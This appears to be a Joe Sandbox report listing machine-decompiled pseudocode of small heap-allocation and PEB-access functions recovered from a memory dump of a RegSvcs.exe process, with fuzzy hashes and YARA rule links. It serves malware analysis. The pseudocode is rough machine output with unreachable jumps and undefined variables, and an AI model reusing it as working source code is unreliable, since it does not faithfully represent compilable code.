Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ed9d5729fa1a035e162b7593fbec65efde5c5c20621b1791cec5ee5561c244
Instruction ID: daf124107576bc7006c19ac3c5cb002a72bb551f4f30a4d8c7ea5c1e6aa1c4f5
Opcode Fuzzy Hash: 52ed9d5729fa1a035e162b7593fbec65efde5c5c20621b1791cec5ee5561c244
Instruction Fuzzy Hash: 4AF082B1A0525DAFDF14EBA8D906E7E77B8EF44304F040459BA09DB3C1EA74D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 01998CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01998CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x19bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E018E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0190B640(E01909AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01998ce5
0x01998ced
0x01998cf0
0x01998cfb
0x01998d0d
0x01998cfd
0x01998d06
0x01998d06
0x01998d18
0x01998d19
0x01998d1b
0x01998d20
0x01998d33

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66b32129dd73543c52633bd819c551e3120396bf41560cfe4ebf7ebcceec0e1
Instruction ID: f626db4771f6417871a6156f2d1e85673bf9fa59b104e873e43a2196adc448cf
Opcode Fuzzy Hash: e66b32129dd73543c52633bd819c551e3120396bf41560cfe4ebf7ebcceec0e1
Instruction Fuzzy Hash: BCF08270A0524DAFDF04DBACE945E6E77B8EF59304F100199E91AEB2C1EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 018E746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E018E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E018DEB70(__ecx, 0x19b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E019095D0();
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x018e746d
0x018e746d
0x018e746d
0x018e7471
0x018e7488
0x0192f92d
0x018e748e
0x018e7491
0x018e7495
0x0192f937
0x0192f93a
0x0192f94e
0x0192f953
0x0192f956
0x0192f956
0x018e7495
0x00000000
0x018e7488
0x018e7473
0x018e7478
0x018e747d
0x018e7481
0x00000000
0x018e7481
0x018e747d
0x018e747a
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137a266f6d41b2a7174b476fc688bbda7061234348873008ae1fc63889e5b13b
Instruction ID: 81716e1e699681e4e48f7fdad87ea7d036ef2795d6c29bee0efdc85ecad75fdc
Opcode Fuzzy Hash: 137a266f6d41b2a7174b476fc688bbda7061234348873008ae1fc63889e5b13b
Instruction Fuzzy Hash: A1F0E238A04249AAEF16DB6CC8C4F79BFF1AF0631CF040215EC95EB1A1E7259A00C7C6

Uniqueness

Uniqueness Score: -1.00%

Function 018C4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E019988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E018EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x18a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x018c4f2e
0x018c4f34
0x018c4f38
0x01920b85
0x01920b85
0x01920b89
0x01920b9a
0x01920b9a
0x01920b9f
0x00000000
0x01920b9f
0x01920b94
0x01920b98
0x00000000
0x00000000
0x00000000
0x01920b98
0x018c4f3e
0x018c4f48
0x00000000
0x018c4f6e
0x00000000
0x018c4f70

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6e49022c39d766433e21d659401d8d8e23dd8cf9eec1e55c2ef5de4383e536
Instruction ID: 3018688e1d0ef99284f753d21475f7435c472252387916538ca76be130d9a6a6
Opcode Fuzzy Hash: 9c6e49022c39d766433e21d659401d8d8e23dd8cf9eec1e55c2ef5de4383e536
Instruction Fuzzy Hash: DBF0E2329216A98FEB72CB1CC148B22BBDDAB01779F484464E409C7926C734EC84C680

Uniqueness

Uniqueness Score: -1.00%

Function 018FA44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x19b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0190FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x018fa44b
0x018fa453
0x018fa472
0x018fa476
0x00000000
0x018fa493
0x018fa47a
0x018fa47f
0x018fa486
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8026b239c4cb3e896ab58320786a9f338a2828d95b938f99897d3ee3fca986
Instruction ID: 4a4cf5a6b8908712f2fce90d2f7d70e4f9c6d9dfa365a0b8eea11c238b66dff4
Opcode Fuzzy Hash: aa8026b239c4cb3e896ab58320786a9f338a2828d95b938f99897d3ee3fca986
Instruction Fuzzy Hash: 06E09272A01421ABD2225A58AC40F66739DDBE5B51F094039E608E7254D628DE01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 018CF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E018CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E018FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L018E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x018cf35d
0x018cf361
0x018cf367
0x018cf372
0x018cf38c
0x018cf38c
0x018cf394

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 8c48627a76fc75d4484dd8e8b6323bd398e54e793bedd22f97eb49ae67516470
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: F8E0D832A40118FBEB2196DD9D05F9ABFADDB54F60F00015ABB04DB590D570DF00C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 018DFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x18a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E019988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E018E0050(_t14);
				}
			}

0x018dff66
0x018dff6b
0x00000000
0x018dff8f
0x00000000
0x018dff8f

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a0bb1d8a6c5b042abf4fbdd64d5877370220a3be9160fec8efd483b204e2d8
Instruction ID: ea6e79000362342900b9299ffe97f22df19816222c4003229e4035a89d8b7132
Opcode Fuzzy Hash: 97a0bb1d8a6c5b042abf4fbdd64d5877370220a3be9160fec8efd483b204e2d8
Instruction Fuzzy Hash: 66E0D8B02053049FD735D759D044F2D3B989B52729F19449DE20ACB102CE21DB42D296

Uniqueness

Uniqueness Score: -1.00%

Function 019541E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E019541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x19a08f0);
				_t5 = E0191D08C(__ebx, __edi, __esi);
				if( *0x19b87ec == 0) {
					E018DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x19b87ec == 0) {
						 *0x19b87f0 = 0x19b87ec;
						 *0x19b87ec = 0x19b87ec;
						 *0x19b87e8 = 0x19b87e4;
						 *0x19b87e4 = 0x19b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01954248();
				}
				return E0191D0D1(_t5);
			}

0x019541e8
0x019541ea
0x019541ef
0x019541fb
0x01954206
0x0195420b
0x01954216
0x0195421d
0x01954222
0x0195422c
0x01954231
0x01954231
0x01954236
0x0195423d
0x0195423d
0x01954247

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452cda876ad4291189deef62d4b8e1237fcdff5499029fd922264a2a84cfb06e
Instruction ID: a46fc33da376b2c1e6c4c7c33a14880cb423982ad678a7c067b94712eea6c13e
Opcode Fuzzy Hash: 452cda876ad4291189deef62d4b8e1237fcdff5499029fd922264a2a84cfb06e
Instruction Fuzzy Hash: 09F01574815705CECBB0EFA996C872436ECF79836AF10415A900897A8CD73445A5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0197D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0197D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L018CE8B0(__ecx, _a4, 0xfff);
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0197d38a
0x0197d39b
0x0197d3b1
0x00000000
0x0197d3b6
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: f9153d5784693d3cd33491f255bfb5095f3f40d0b30ed085889e05e6c7e4273f
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 4EE0C231284209BBDB225E88CC00F697B9ADF50BA5F104035FE089A690C675DD91D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 018FA185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x19b67e4 >= 0xa) {
					if(_t5 < 0x19b6800 || _t5 >= 0x19b6900) {
						return L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E018E0010(0x19b67e0, _t5);
				}
			}

0x018fa190
0x018fa1a6
0x018fa1c2
0x00000000
0x00000000
0x00000000
0x018fa192
0x018fa192
0x018fa19f
0x018fa19f

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e15ae106e09dda8aa718d6f59ffe2c2269e3db8eaf47626f3a1f0dcd6697b0a9
Instruction ID: 0179b5e6436c40ef50e9cca9434f303cd4eb037b5144d10a8c228bf01dcd7877
Opcode Fuzzy Hash: e15ae106e09dda8aa718d6f59ffe2c2269e3db8eaf47626f3a1f0dcd6697b0a9
Instruction Fuzzy Hash: 8CD02B7116060056D62D13049EE8B613696F784B70F35080CF30FCB590E950AAD0A109

Uniqueness

Uniqueness Score: -1.00%

Function 018F16E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E018F1710(0x19b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L018E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x018f16e8
0x018f16ef
0x018f16f3
0x018f16fe
0x00000000
0x018f1700
0x018f170d
0x018f170d
0x018f16f2
0x018f16f2
0x018f16f2
0x018f16f2

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43aacccc18505d6e447e97fc9040b583b7effb3f437d4f0c7d643b96166f83f
Instruction ID: cc348b7289cd796a7f4324ba20cc81797fab87cb3b50ca1ee2a82739278642b7
Opcode Fuzzy Hash: d43aacccc18505d6e447e97fc9040b583b7effb3f437d4f0c7d643b96166f83f
Instruction Fuzzy Hash: 4CD0A731110201D2EE2D5B18984CB142695EB90781F38005CF30FD94D0DFA5DE92E44C

Uniqueness

Uniqueness Score: -1.00%

Function 019453CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E019453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E018DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x019453ca
0x019453ce
0x019453d9
0x019453de
0x019453e1
0x019453e1
0x019453e6
0x019453f3
0x00000000
0x019453f8
0x019453fb

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 6b7c60c34aa602a93aaa0c1c83cdf712cd0effeb0a5dfae83853bcc5b2bf1f5b
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 06E08C32944784DBDF12EB8CCA90F4EBBF9FB44B00F150044A008AF620C624AD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 018DAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x018daab6
0x018daabb
0x0192a442
0x00000000
0x0192a448
0x0192a454
0x0192a454
0x018daac1
0x018daac1
0x018daac6
0x018daac6

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 7c9d1a6521dacd54b66a8892302470cfc9814682f2c0d31240ff67e4989bca38
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 9CD0C939352A80CFD61BCB0CC554B0533A8BB04B40FD50590E500CBB62E62CD940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 018F35A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E018DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x018f35a1
0x018f35a1
0x018f35a5
0x018f35ab
0x018f35ab
0x018f35b5
0x00000000
0x018f35c1
0x018f35b7

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 30c7a84a2b08fc76673523ee0bab74ee47b12b86a9989e6483bd187b21495720
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: F3D0A731401285B9DF01AF18C11C76C3771BB4430CF58105DAA4189452C3354B09C701

Uniqueness

Uniqueness Score: -1.00%

Function 018CDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L018E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x018cdb4d
0x018cdb54
0x018cdb5f
0x018cdb56
0x018cdb56
0x018cdb5c
0x018cdb5c

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: bef5e54ae25c2dad1c56334b02f3ba4091c8c5d5e3986789cc7cef709c53ab78
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 47C08C30280A01AAFB222F24CD01B003AA0BB11F01F4400A07300DA0F0EB78DA01EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0194A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0194A537(intOrPtr _a4, intOrPtr _a8) {

				return L018E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0194a553

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: ddc262c372ad157ef38cfe94c11bf09d25f96674132dc21b4bf9f7f46b9da000
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: A3C08C33080248BBCB126F85CC00F1A7F6AFBA5B60F008010FA080B570C632EA70EB84

Uniqueness

Uniqueness Score: -1.00%

Function 018E3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018E3A1C(intOrPtr _a4) {
				void* _t5;

				return L018E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x018e3a35

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 91d871ffd0ebf498d52a90cb56e976c7d75f1ad03e905721fa32a82a58165183
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 61C08C32080248BBCB126E45DC00F017B69E7A0B60F000020B6084A5708532ED60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 018CAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018CAD30(intOrPtr _a4) {

				return L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x018cad49

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 13fe76946bb38576cee54ca39b1854646d6070ffecde1fe1bae3e764c5b164da
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: F3C08C320C0248BBC7126A49DD00F017B69E7A0B60F000020B6044A6618932E960D588

Uniqueness

Uniqueness Score: -1.00%

Function 018F36CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x018f36d2
0x018f36e8
